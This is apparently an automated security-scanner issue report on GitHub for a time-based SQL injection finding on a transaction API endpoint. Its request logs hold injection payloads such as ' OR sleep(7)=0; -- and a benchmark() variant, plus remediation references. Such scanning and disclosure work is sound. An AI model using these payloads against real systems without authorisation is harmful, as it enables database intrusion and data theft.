muqeetkhan20 / JuneSanity


SQL_Injection_Timebound on PUT:/api/v1/primary-transaction #2107

Open qauser21 opened 3 years ago

qauser21 commented 3 years ago

Title: SQL_Injection_Timebound Vulnerability on PUT:/api/v1/primary-transaction
Project: Sanity 7th July
Description:

Assertion Name: SQL Injection ( 1 )

Overview: SQL Injection is an attack. It is executed by insertion or “injection” of either a partial or complete SQL query via query parameters, request body parameters or path parameters, which is then passed to the application server/database.

Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” was consistently rated the Top 1 category of attack by OWASP in the years 2010, 2013 and 2017 ( 2 ). SQL Injection is rated Top 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).

Vulnerability Impact: A Successful SQL Injection attack

Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically correct SQL query. If an error is thrown back by the API for an incorrect query, it becomes much easier for the attacker to reconstruct the logic of the original query. If the error is hidden, the attacker may have to reverse engineer it for exploitation. It might happen because of the following

Remediation: A successful SQL Injection attack may possibly be avoided by Secure Coding Practices as outlined by OWASP SQL injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.
References:
  1. SQL Injection: https://www.owasp.org/index.php/SQL_Injection
  2. OWASP Top 10 – 2017 – A1 Injection - https://www.owasp.org/index.php/Top_10-2017_A1-Injection
  3. CWE – SANS – TOP 25 - http://cwe.mitre.org/top25/
  4. Common Weakness Enumeration – SQL Injection - http://cwe.mitre.org/data/definitions/89.html
  5. OWASP SQL Injection Prevention Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Risk: SQL_Injection_Timebound
Severity: Critical
API Endpoint: http://95.217.118.53:8080/api/v1/primary-transaction
Environment: Master
Playbook: ApiV1PrimaryTransactionPutBodyParamSqlInjectionTimebound
Researcher: [apisec Bot]

QUICK TIPS

Suggestion:
Effort Estimate: null Hrs
Wire Logs:

00:45:53 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction]
00:45:53 [D] [AVPTPBPSITimebound] : Method [PUT]
00:45:53 [D] [AVPTPBPSITimebound] : Authorization [Default]
00:45:53 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]]
00:45:53 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "3351", "availableBalance" : "778628553", "createdBy" : "", "createdDate" : "", "description" : "' OR sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' OR sleep(7)=0; -- ", "type" : "' OR sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' OR sleep(7)=0; -- ", "version" : "" }, "version" : "" }]
00:45:53 [D] [AVPTPBPSITimebound] : Status code [200]
00:45:53 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=Yjc3MmMzYjUtMmNmZS00NjQwLWFkNjYtYmEwMGE0OWNlNTll; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 09 Sep 2021 00:45:52 GMT"]]
00:45:53 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-09T00:45:53.595+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:45:53 [D] [AVPTPBPSITimebound] : Response time [1042]
00:45:53 [D] [AVPTPBPSITimebound] : Response size [306]
00:45:53 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
00:46:11 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [1042 < 7000] result [Passed]

00:46:13 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction]
00:46:13 [D] [AVPTPBPSITimebound] : Method [PUT]
00:46:13 [D] [AVPTPBPSITimebound] : Authorization [Default]
00:46:13 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]]
00:46:13 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "6855", "availableBalance" : "1213361603", "createdBy" : "", "createdDate" : "", "description" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "type" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "version" : "" }, "version" : "" }]
00:46:13 [D] [AVPTPBPSITimebound] : Status code [200]
00:46:13 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=OTY4Y2FhM2YtMzZlYi00ZTZlLTk3OGUtNmQzNjIwNThiMzJl; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 09 Sep 2021 00:46:12 GMT"]]
00:46:13 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-09T00:46:12.920+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:46:13 [D] [AVPTPBPSITimebound] : Response time [1862]
00:46:13 [D] [AVPTPBPSITimebound] : Response size [306]
00:46:13 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [1862 < 7000] result [Passed]
00:46:13 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]

00:46:30 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction]
00:46:30 [D] [AVPTPBPSITimebound] : Method [PUT]
00:46:30 [D] [AVPTPBPSITimebound] : Authorization [Default]
00:46:30 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]]
00:46:30 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "3413", "availableBalance" : "255006364", "createdBy" : "", "createdDate" : "", "description" : "' AND sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' AND sleep(7)=0; -- ", "type" : "' AND sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' AND sleep(7)=0; -- ", "version" : "" }, "version" : "" }]
00:46:30 [D] [AVPTPBPSITimebound] : Status code [200]
00:46:30 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=MDk2ZWRhYTctN2VhNi00NjU3LTk0ZGYtZmNkZDQzYzc4M2Q4; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 09 Sep 2021 00:46:13 GMT"]]
00:46:30 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-09T00:46:14.440+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:46:30 [D] [AVPTPBPSITimebound] : Response time [17155]
00:46:30 [D] [AVPTPBPSITimebound] : Response size [306]
00:46:30 [E] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [17155 < 7000] result [Failed]
00:46:30 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]

IMPORTANT LINKS

Vulnerability Details: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e17bc3f336017bc8053c967d9c/details

Project: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/allScans

Environment: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/environments/8a8093567a8012b6017a803bf3181500/edit

Scan Dashboard: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/profiles/8a8093567a8012b6017a803c070d16cb/runs/8a8094e17bc3f336017bc800e2637841

Playbook: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/playbooks/ApiV1PrimaryTransactionPutBodyParamSqlInjectionTimebound

Coverage: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/categories

Code Sample: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e17bc3f336017bc8053c967d9c/codesamples

PS: Please contact support@apisec.ai for apisec access and login issues.

--- apisec Bot ---